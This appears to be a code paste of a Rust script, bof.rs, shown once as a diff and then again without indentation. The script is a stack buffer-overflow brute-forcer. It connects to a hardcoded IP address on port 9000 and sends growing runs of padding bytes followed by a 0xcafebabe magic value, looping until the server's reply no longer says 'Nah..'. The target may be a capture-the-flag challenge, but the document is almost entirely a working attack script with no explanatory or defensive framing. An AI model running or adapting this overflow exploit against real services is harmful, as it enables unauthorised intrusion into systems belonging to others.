Lucretiel · May 13, 2020 20:23
diff --git a/bof.rs b/bof.rs
 use std::io::{self, BufReader, BufWriter, Read};
 use std::net;

 #[derive(Debug, Copy, Clone)]
 struct SlamParams<'a> {
    prefix_length: usize,
    payload: &'a [u8],
 }

 fn deliver_payload(mut dest: impl io::Write, params: SlamParams) -> io::Result<()> {
    for _ in 0..params.prefix_length {
        dest.write_all(&[b'a'])?;
    }
    dest.write_all(params.payload)?;
    dest.flush()?;
    Ok(())
 }

 fn stack_slam(dest: net::SocketAddr, params: SlamParams) -> io::Result<String> {
    let connection = net::TcpStream::connect(dest)?;

    let writer = BufWriter::new(&connection);
    deliver_payload(writer, params)?;
    connection.shutdown(net::Shutdown::Write)?;

    let mut reader = BufReader::new(&connection);
    let mut result = String::new();
    reader.read_to_string(&mut result)?;

    Ok(result)
 }

 fn main() {
    let payloads = [&[0xca, 0xfe, 0xba, 0xbe][..], &[0xbe, 0xba, 0xfe, 0xca][..]];
    let addr = ([128, 61, 240, 205], 9000).into();

    for prefix_length in 0..100 {
        for &payload in &payloads {
            let params = SlamParams {
                prefix_length,
                payload,
            };

            println!("Attempting {:?}", params);

            match stack_slam(addr, params) {
                Ok(result) if !result.contains("Nah..") => {
                    println!("Success!");
                    return;
                }
                Err(err) => {
                    println!("Error with : {}", err);
                    return;
                }
                _ => {}
            }
        }
    }
 }
	use std::io::{self, BufReader, BufWriter, Read};
	use std::net;

	#[derive(Debug, Copy, Clone)]
	struct SlamParams<'a> {
	prefix_length: usize,
	payload: &'a [u8],
	}

	fn deliver_payload(mut dest: impl io::Write, params: SlamParams) -> io::Result<()> {
	for _ in 0..params.prefix_length {
	dest.write_all(&[b'a'])?;
	}
	dest.write_all(params.payload)?;
	dest.flush()?;
	Ok(())
	}

	fn stack_slam(dest: net::SocketAddr, params: SlamParams) -> io::Result<String> {
	let connection = net::TcpStream::connect(dest)?;

	let writer = BufWriter::new(&connection);
	deliver_payload(writer, params)?;
	connection.shutdown(net::Shutdown::Write)?;

	let mut reader = BufReader::new(&connection);
	let mut result = String::new();
	reader.read_to_string(&mut result)?;

	Ok(result)
	}

	fn main() {
	let payloads = [&[0xca, 0xfe, 0xba, 0xbe][..], &[0xbe, 0xba, 0xfe, 0xca][..]];
	let addr = ([128, 61, 240, 205], 9000).into();

	for prefix_length in 0..100 {
	for &payload in &payloads {
	let params = SlamParams {
	prefix_length,
	payload,
	};

	println!("Attempting {:?}", params);

	match stack_slam(addr, params) {
	Ok(result) if !result.contains("Nah..") => {
	println!("Success!");
	return;
	}
	Err(err) => {
	println!("Error with : {}", err);
	return;
	}
	_ => {}
	}
	}
	}
	}